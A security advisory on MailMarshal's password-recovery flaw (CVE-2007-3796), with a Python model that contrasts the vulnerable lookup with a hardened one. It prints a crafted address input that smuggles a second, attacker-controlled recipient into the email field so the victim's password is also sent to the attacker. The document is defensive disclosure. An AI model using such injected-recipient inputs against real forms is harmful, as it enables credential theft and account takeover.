Orange Business Services
Vigil@nce
we track for your security since 1999
Vulnerability announcement CVE-2007-3796

MailMarshal: password retrieval

Synthesis of the vulnerability

An attacker can submit a specially crafted request to force MailMarshal to send the password of a Spam Quarantine interface account to an address he controls.
Impacted products: MailMarshal.
Severity: 2/4.
Creation date: 17/07/2007.
Identifiers: CVE-2007-3796, VIGILANCE-VUL-7012.

Description of the vulnerability

To access the web interface of MailMarshal Spam Quarantine, a login (an email address) and its password are required. If a user loses his password, the /SpamConsole/Register.aspx form can send it back to him.

This form sends the password to the email address entered by the user. However, the address is truncated before it is checked against the database, while the untruncated value is used as the recipient list. For example, if the attacker enters the following address:
  victim@victim.dom _spaces_ ; attacker@attacker.dom
the database lookup (which verifies that the address is registered) only compares:
  victim@victim.dom
but the script sends the mail to:
  victim@victim.dom ; attacker@attacker.dom
The attacker therefore also receives the email containing the password.

An attacker who knows a user's email address can therefore obtain that user's password.
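The flaw is a mismatch between the value that is validated and the value that is acted on. The following Python model is an added example, not MailMarshal code: it reproduces the described behaviour (lookup on a truncated, right-trimmed copy of the input, mail sent to the full input split on ";") beside a hardened version that accepts only a single well-formed address, re-checks that the stored row matches the input exactly, and addresses the mail using the stored value. The 20-character lookup width, the in-memory SQLite table, the registered user and the password are constructed assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed fixture: one registered Spam Quarantine user (not real data).
REGISTERED_USERS = [("victim@victim.dom", "s3cret-pw")]

# Assumption: the lookup column is limited to 20 characters, so the comparison
# value is cut to that width and trailing spaces are ignored, as described above.
LOOKUP_WIDTH = 20

# The crafted input from the bulletin: the real address, padding spaces,
# then a second recipient separated by ";".
ATTACK_INPUT = "victim@victim.dom   ; attacker@attacker.dom"


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", REGISTERED_USERS)
    return conn


CONN = _db()


def vulnerable_send_password(submitted):
    """Model of the flawed flow: the database check sees a truncated, trimmed
    copy of the input, but the mail is addressed with the full input string.
    Returns the mail that would be sent (recipients + password) or None."""
    lookup_key = submitted[:LOOKUP_WIDTH].rstrip()
    row = CONN.execute("SELECT password FROM users WHERE email = ?",
                       (lookup_key,)).fetchone()
    if row is None:
        return None
    # The mailer splits the raw input on ";" and delivers to every part.
    recipients = [r.strip() for r in submitted.split(";") if r.strip()]
    return {"to": recipients, "password": row[0]}


# Single address only: no whitespace, no ";" or "," separators, one "@".
_SINGLE_ADDRESS = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def hardened_send_password(submitted):
    """Hardened flow: reject anything that is not exactly one address, require
    the stored value to equal the input (defence against truncating columns),
    and address the mail using the value from the database, never the input."""
    if not _SINGLE_ADDRESS.fullmatch(submitted):
        return None
    row = CONN.execute("SELECT email, password FROM users WHERE email = ?",
                       (submitted,)).fetchone()
    if row is None or row[0] != submitted:
        return None
    return {"to": [row[0]], "password": row[1]}


if __name__ == "__main__":
    print("vulnerable:", vulnerable_send_password(ATTACK_INPUT))
    print("hardened  :", hardened_send_password(ATTACK_INPUT))
    print("hardened, legitimate:", hardened_send_password("victim@victim.dom"))
```

The vulnerable function returns a mail addressed to both victim@victim.dom and attacker@attacker.dom for the crafted input, while the hardened one refuses it and only ever sends to the canonical stored address. Independently of this bug, mailing a stored password at all implies it is recoverable server-side; a reset link or one-time token sent to the stored address avoids both problems.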


Copyright 1999-2013 Vigil@nce. Vigil@nce is a service from Orange Business Services.